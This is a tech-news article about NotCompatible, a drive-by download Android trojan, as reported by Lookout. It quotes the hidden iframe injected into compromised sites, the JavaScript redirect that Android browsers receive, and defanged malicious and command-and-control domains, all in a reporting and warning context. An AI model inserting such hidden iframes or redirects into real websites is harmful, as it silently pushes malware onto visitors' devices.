Malware Hits the Mobile Web, Targets Android Handsets
Fandroids are plagued with malware left and right. Their device can get infected from downloading apps in Google Play but especially from unofficial third-party app stores. But the worst part is, drive by download malware is now attacking Android devices.
NotCompatible
Lookout Mobile Security recently identified a drive by download malware dubbed as NotCompatible. Drive by download is common in PCs. When a user visits an infected site, the malware secretly infects the computer if it doesn’t have updated security measures.
NotCompatible works in a similar manner: if someone used his Android device in visiting an infected site, their web browser will automatically download an application and when it finishes downloading, the device displays a notification alerting the user to click on the notification to install the downloaded app. But first, the “Unknown sources” setting should be enabled (this feature is commonly referred to as “sideloading”) or the installation would be blocked.
Lookout’s report stated that infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
When a PC web browser is used to access the infected site, a “not found” error appears, but if a web browser containing the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>
Lookout identified the following sites serving malicious Android apps:
- gaoanalitics.info
- androidonlinefix.info
While Command and Control (C&C) domains include:
- notcompatibleapp.eu
Lookout assured their subscribers that they are protected from NotCompatible, and reiterated that unless the app is actually installed, the device won’t become infected.
“Based on our current research, NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update,” Lookout wrote in their updated report.
“This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.”
A message from John Furrier, co-founder of SiliconANGLE:
Support our mission to keep content open and free by engaging with theCUBE community. Join theCUBE’s Alumni Trust Network, where technology leaders connect, share intelligence and create opportunities.
- 15M+ viewers of theCUBE videos, powering conversations across AI, cloud, cybersecurity and more
- 11.4k+ theCUBE alumni — Connect with more than 11,400 tech and business leaders shaping the future through a unique trusted-based network.
About SiliconANGLE Media
SiliconANGLE Media is a recognized leader in digital media innovation, uniting breakthrough technology, strategic insights and real-time audience engagement. As the parent company of SiliconANGLE, theCUBE Network, theCUBE Research, CUBE365, theCUBE AI and theCUBE SuperStudios — with flagship locations in Silicon Valley and the New York Stock Exchange — SiliconANGLE Media operates at the intersection of media, technology and AI.
Founded by tech visionaries John Furrier and Dave Vellante, SiliconANGLE Media has built a dynamic ecosystem of industry-leading digital media brands that reach 15+ million elite tech professionals. Our new proprietary theCUBE AI Video Cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.
